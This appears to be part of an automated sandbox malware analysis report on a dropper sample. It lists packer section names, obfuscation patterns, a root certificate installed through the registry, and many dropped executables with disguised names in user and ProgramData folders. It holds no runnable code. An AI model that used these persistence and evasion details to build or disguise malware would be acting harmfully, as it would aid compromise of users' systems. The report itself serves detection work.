Source: 060[1].exe.0.dr	Static PE information: real checksum: 0x0 should be: 0x4f5bd9
Source: cad54ba5b01423b1af8ec10ab5719d97[1].exe.0.dr	Static PE information: real checksum: 0x41d363 should be: 0x422cc4
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe.0.dr	Static PE information: real checksum: 0x0 should be: 0x311de9
Source: wDFs1SzoVQiT2__nQmbIm6Rg.exe.0.dr	Static PE information: real checksum: 0x0 should be: 0x821d7
Source: fiona[1].exe.0.dr	Static PE information: real checksum: 0x0 should be: 0x311de9
Source: njeL_S54LMD1B6b6sdXBUgG6.exe.0.dr	Static PE information: real checksum: 0x41d363 should be: 0x422cc4

PE file contains sections with non-standard names

Source: WlCIinu0yp.exe	Static PE information: section name:
Source: WlCIinu0yp.exe	Static PE information: section name:
Source: WlCIinu0yp.exe	Static PE information: section name: .themida
Source: Retailer_prog[1].exe.0.dr	Static PE information: section name: .MPRESS1
Source: Retailer_prog[1].exe.0.dr	Static PE information: section name: .MPRESS2
Source: H14SDf_AWcPvvQK5Xx97sISX.exe.0.dr	Static PE information: section name: .MPRESS1
Source: H14SDf_AWcPvvQK5Xx97sISX.exe.0.dr	Static PE information: section name: .MPRESS2
Source: Default12_big[1].exe.0.dr	Static PE information: section name: .MPRESS1
Source: Default12_big[1].exe.0.dr	Static PE information: section name: .MPRESS2
Source: hvkESMr10WtP7_E6btIJmDx0.exe.0.dr	Static PE information: section name: .MPRESS1
Source: hvkESMr10WtP7_E6btIJmDx0.exe.0.dr	Static PE information: section name: .MPRESS2
Source: fiona[1].exe.0.dr	Static PE information: section name:
Source: fiona[1].exe.0.dr	Static PE information: section name:
Source: fiona[1].exe.0.dr	Static PE information: section name:
Source: fiona[1].exe.0.dr	Static PE information: section name:
Source: fiona[1].exe.0.dr	Static PE information: section name:
Source: fiona[1].exe.0.dr	Static PE information: section name:
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe.0.dr	Static PE information: section name:
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe.0.dr	Static PE information: section name:
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe.0.dr	Static PE information: section name:
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe.0.dr	Static PE information: section name:
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe.0.dr	Static PE information: section name:
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe.0.dr	Static PE information: section name:
Source: 123p[1].exe.0.dr	Static PE information: section name: .00cfg
Source: 123p[1].exe.0.dr	Static PE information: section name: .text0
Source: 123p[1].exe.0.dr	Static PE information: section name: .text1
Source: 123p[1].exe.0.dr	Static PE information: section name: .text2
Source: 0aUjr05rR32eKJo8dvN8X8hr.exe.0.dr	Static PE information: section name: .00cfg
Source: 0aUjr05rR32eKJo8dvN8X8hr.exe.0.dr	Static PE information: section name: .text0
Source: 0aUjr05rR32eKJo8dvN8X8hr.exe.0.dr	Static PE information: section name: .text1
Source: 0aUjr05rR32eKJo8dvN8X8hr.exe.0.dr	Static PE information: section name: .text2
Source: wDFs1SzoVQiT2__nQmbIm6Rg.exe.0.dr	Static PE information: section name: .Right
Source: 9RJ0JeM9uj2rfsuq_woBmmIY.exe.0.dr	Static PE information: section name: .Shine
Source: ifM1E2HUtOYe96efnF4a_sDH.exe.0.dr	Static PE information: section name: .vmp1024
Source: ifM1E2HUtOYe96efnF4a_sDH.exe.0.dr	Static PE information: section name: .vmp1024
Source: setup[1].exe.0.dr	Static PE information: section name: .sxdata
Source: q9Sc3pS9TsI8vZtTlbAuGG_b.exe.0.dr	Static PE information: section name: .sxdata
Source: Space1.9_big[1].exe.0.dr	Static PE information: section name: .MPRESS1
Source: Space1.9_big[1].exe.0.dr	Static PE information: section name: .MPRESS2
Source: rYuCm9r3mZzk_0VrthAnPu8c.exe.0.dr	Static PE information: section name: .MPRESS1
Source: rYuCm9r3mZzk_0VrthAnPu8c.exe.0.dr	Static PE information: section name: .MPRESS2

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Code function: 7_2_006BE177 push ebp; mov dword ptr [esp], 00000004h	7_2_0096D884
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Code function: 7_2_0070415A push esi; mov dword ptr [esp], ecx	7_2_00971463
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Code function: 7_2_006C9129 push ecx; mov dword ptr [esp], 659B8DACh	7_2_00995BA3
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Code function: 7_2_005FE137 push 65E6F80Ah; mov dword ptr [esp], eax	7_2_009A824D
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Code function: 7_2_005FE137 push 6AD2D916h; mov dword ptr [esp], ecx	7_2_009B59B7
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Code function: 7_2_005F51F9 push 028D9D34h; mov dword ptr [esp], edx	7_2_009B6F69
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Code function: 7_2_004DD189 push ecx; ret	7_2_004DD19C
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Code function: 7_2_007111A6 push 2B03A790h; mov dword ptr [esp], edi	7_2_00988941
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Code function: 7_2_005CF185 push esi; mov dword ptr [esp], 0F6E47D3h	7_2_009BA4F6
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Code function: 7_2_005B4223 push 1B0273DFh; mov dword ptr [esp], esi	7_2_0099CE7E
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Code function: 7_2_006B234A push ecx; mov dword ptr [esp], edx	7_2_009B19CE
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Code function: 7_2_006B234A push eax; mov dword ptr [esp], edx	7_2_009B19E8
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Code function: 7_2_005F939D push 62D5C5BCh; mov dword ptr [esp], edi	7_2_009B0759
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Code function: 7_2_006C339B push 04BD78A0h; mov dword ptr [esp], ebx	7_2_009989EE
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Code function: 7_2_005FA449 push 12672850h; mov dword ptr [esp], edi	7_2_009AEB84
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Code function: 7_2_00718415 push ebx; mov dword ptr [esp], edi	7_2_009A5ED6
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Code function: 7_2_006BF4C8 push esi; mov dword ptr [esp], 6B355F99h	7_2_0098D96D
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Code function: 7_2_005B5579 push edx; mov dword ptr [esp], ecx	7_2_009B1043
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Code function: 7_2_006BB50B push ebx; mov dword ptr [esp], ecx	7_2_009BCA3D
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Code function: 7_2_005E0523 push 31E0CF80h; mov dword ptr [esp], esp	7_2_00990856
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Code function: 7_2_005E0523 push 74CF83F9h; mov dword ptr [esp], ecx	7_2_009B7503
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Code function: 7_2_005CB652 push 41EB57B3h; mov dword ptr [esp], ecx	7_2_009B50E6
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Code function: 7_2_005E36DA push ebp; mov dword ptr [esp], eax	7_2_009B9534
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Code function: 7_2_006BB6CB push eax; mov dword ptr [esp], ecx	7_2_009B0F29
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Code function: 7_2_006BB6CB push 25FCB98Bh; mov dword ptr [esp], ebp	7_2_009B42F1
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Code function: 7_2_0060269F push ebp; mov dword ptr [esp], eax	7_2_009B63D3
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Code function: 7_2_0060269F push ebx; mov dword ptr [esp], edi	7_2_009B63DE
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Code function: 7_2_0060269F push 2D75C53Eh; mov dword ptr [esp], edi	7_2_009BC38F
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Code function: 7_2_006BB775 push 4E0FB89Eh; mov dword ptr [esp], ebp	7_2_009B9490
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Code function: 7_2_005C77DE push esi; mov dword ptr [esp], edi	7_2_009ACCF0
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Code function: 7_2_007C97DE push ebx; mov dword ptr [esp], ecx	7_2_009829F9

Source: WlCIinu0yp.exe	Static PE information: section name: entropy: 7.282847728316021
Source: fiona[1].exe.0.dr	Static PE information: section name: entropy: 7.99971394901448
Source: fiona[1].exe.0.dr	Static PE information: section name: entropy: 7.991451211560384
Source: fiona[1].exe.0.dr	Static PE information: section name: entropy: 7.81952942947184
Source: fiona[1].exe.0.dr	Static PE information: section name: entropy: 7.993366885563393
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe.0.dr	Static PE information: section name: entropy: 7.99971394901448
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe.0.dr	Static PE information: section name: entropy: 7.991451211560384
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe.0.dr	Static PE information: section name: entropy: 7.81952942947184
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe.0.dr	Static PE information: section name: entropy: 7.993366885563393

Persistence and Installation Behavior

Drops PE files to the document folder of the user

Source: C:\Users\user\Desktop\WlCIinu0yp.exe	File created: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	Jump to dropped file
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	File created: C:\Users\user\Documents\SimpleAdobe\0kNDw1qtthM70owdcV01L1ro.exe	Jump to dropped file
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	File created: C:\Users\user\Documents\SimpleAdobe\H14SDf_AWcPvvQK5Xx97sISX.exe	Jump to dropped file
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	File created: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Jump to dropped file
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	File created: C:\Users\user\Documents\SimpleAdobe\9RJ0JeM9uj2rfsuq_woBmmIY.exe	Jump to dropped file
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	File created: C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe	Jump to dropped file
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	File created: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe	Jump to dropped file
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	File created: C:\Users\user\Documents\SimpleAdobe\FCK5Px_iTbBaGQTFBpzZeks2.exe	Jump to dropped file
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	File created: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Jump to dropped file
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	File created: C:\Users\user\Documents\SimpleAdobe\q9Sc3pS9TsI8vZtTlbAuGG_b.exe	Jump to dropped file
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	File created: C:\Users\user\Documents\SimpleAdobe\lmmycYk2THJ6kqlicmdyWtVT.exe	Jump to dropped file
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	File created: C:\Users\user\Documents\SimpleAdobe\wDFs1SzoVQiT2__nQmbIm6Rg.exe	Jump to dropped file
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	File created: C:\Users\user\Documents\SimpleAdobe\cX55WveNgznoE8Y_EKeykvl8.exe	Jump to dropped file
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	File created: C:\Users\user\Documents\SimpleAdobe\ifM1E2HUtOYe96efnF4a_sDH.exe	Jump to dropped file
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	File created: C:\Users\user\Documents\SimpleAdobe\0aUjr05rR32eKJo8dvN8X8hr.exe	Jump to dropped file
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	File created: C:\Users\user\Documents\SimpleAdobe\njeL_S54LMD1B6b6sdXBUgG6.exe	Jump to dropped file

Installs new ROOT certificates

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 Blob

Drops PE files

Source: C:\Users\user\Desktop\WlCIinu0yp.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\Default12_big[1].exe	Jump to dropped file
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\aeb24096[1].exe	Jump to dropped file
Source: C:\Users\user\Documents\SimpleAdobe\ifM1E2HUtOYe96efnF4a_sDH.exe	File created: C:\Users\user\AppData\Local\Temp\PowerExpertNT\PowerExpertNT.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	File created: C:\Users\user\AppData\Local\Temp\is-6APVR.tmp\_isetup\_iscrypt.dll	Jump to dropped file
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	File created: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	File created: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\is-280SC.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	File created: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\unins000.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\softjenimmp3converter.exe	File created: C:\ProgramData\DDEReadline 2.22.66\DDEReadline 2.22.66.exe	Jump to dropped file
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	File created: C:\Users\user\Documents\SimpleAdobe\0kNDw1qtthM70owdcV01L1ro.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	File created: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\is-FREGM.tmp	Jump to dropped file
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	File created: C:\Users\user\Documents\SimpleAdobe\H14SDf_AWcPvvQK5Xx97sISX.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	File created: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\is-8REGQ.tmp	Jump to dropped file
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	File created: C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe	Jump to dropped file
Source: C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe	File created: C:\ProgramData\MPGPH131\MPGPH131.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	File created: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\libmp3lame.dll (copy)	Jump to dropped file
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	File created: C:\Users\user\Documents\SimpleAdobe\wDFs1SzoVQiT2__nQmbIm6Rg.exe	Jump to dropped file
Source: C:\Users\user\Documents\SimpleAdobe\0aUjr05rR32eKJo8dvN8X8hr.exe	File created: C:\ProgramData\ndfbaljqaqzm\dckuybanmlgp.exe	Jump to dropped file
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	File created: C:\Users\user\Documents\SimpleAdobe\cX55WveNgznoE8Y_EKeykvl8.exe	Jump to dropped file
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	File created: C:\Users\user\Documents\SimpleAdobe\ifM1E2HUtOYe96efnF4a_sDH.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	File created: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\is-V4HAL.tmp	Jump to dropped file
Source: C:\Users\user\Documents\SimpleAdobe\ifM1E2HUtOYe96efnF4a_sDH.exe	File created: C:\Users\user\AppData\Local\ExtreamFanV5\ExtreamFanV5.exe	Jump to dropped file
Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe	File created: C:\Users\user\AppData\Local\Temp\Protect544cd51a.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	File created: C:\Users\user\AppData\Local\Temp\is-6APVR.tmp\_isetup\_setup64.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	File created: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\is-HPQQQ.tmp	Jump to dropped file
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\Space1.9_big[1].exe	Jump to dropped file
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\timeSync[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	File created: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\msvcp120.dll (copy)	Jump to dropped file
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\7725eaa6592c80f8124e769b4e8a07f7[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	File created: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\Qt5Xml.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	File created: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\msvcp140.dll (copy)	Jump to dropped file
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	File created: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe	Jump to dropped file
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	File created: C:\Users\user\Documents\SimpleAdobe\FCK5Px_iTbBaGQTFBpzZeks2.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	File created: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\is-OFQC1.tmp	Jump to dropped file
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	File created: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Jump to dropped file
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	File created: C:\Users\user\Documents\SimpleAdobe\q9Sc3pS9TsI8vZtTlbAuGG_b.exe	Jump to dropped file
Source: C:\Users\user\Documents\SimpleAdobe\q9Sc3pS9TsI8vZtTlbAuGG_b.exe	File created: C:\Users\user\AppData\Local\Temp\7zS4AA4.tmp\Install.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	File created: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\is-5QCAU.tmp	Jump to dropped file
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\fiona[1].exe	Jump to dropped file
Source: C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe	File created: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	File created: C:\Users\user\AppData\Local\Temp\is-6APVR.tmp\_isetup\_RegDLL.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	File created: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\is-7LPN0.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	File created: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\is-T59CT.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	File created: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\openh264.dll (copy)	Jump to dropped file
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	File created: C:\Users\user\AppData\Local\AdobeUpdaterV202_93c4750d07be7885c8f839a66372e48f\AdobeUpdaterV202.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	File created: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\QtAVWidgets1.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	File created: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\msvcr120.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	File created: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\is-OPKFD.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	File created: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\is-ETDPI.tmp	Jump to dropped file
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\lumma2804[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	File created: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\Qt5OpenGL.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	File created: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\Qt5WinExtras.dll (copy)	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\sqlx[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	File created: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Jump to dropped file
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\cad54ba5b01423b1af8ec10ab5719d97[1].exe	Jump to dropped file
Source: C:\Users\user\Documents\SimpleAdobe\FCK5Px_iTbBaGQTFBpzZeks2.exe	File created: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	File created: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\libcurl.dll (copy)	Jump to dropped file
Source: C:\Users\user\Documents\SimpleAdobe\ifM1E2HUtOYe96efnF4a_sDH.exe	File created: C:\ProgramData\WinTrackerSP\WinTrackerSP.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	File created: C:\Users\user\AppData\Local\Temp\is-6APVR.tmp\_isetup\_shfoldr.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	File created: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\msvcp140_1.dll (copy)	Jump to dropped file
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\060[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	File created: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\Qt5Svg.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	File created: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\is-0CK56.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7zS4AA4.tmp\Install.exe	File created: C:\Users\user\AppData\Local\Temp\7zS6DDC.tmp\Install.exe	Jump to dropped file
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	File created: C:\ProgramData\MSIUpdaterV202_93c4750d07be7885c8f839a66372e48f\MSIUpdaterV202.exe	Jump to dropped file
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\setup[1].exe	Jump to dropped file
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\lumma2804[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	File created: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\libeay32.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	File created: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\mousehelper.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	File created: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\avdevice-58.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	File created: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\is-1CATB.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	File created: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\is-G7OJ6.tmp	Jump to dropped file
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	File created: C:\Users\user\AppData\Local\Temp\heidiLgVUNbWj4Aw0\6JeTTVCBi2pYO9g7t24p.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	File created: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\is-PT3AE.tmp	Jump to dropped file
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\Retailer_prog[1].exe	Jump to dropped file
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\123p[1].exe	Jump to dropped file
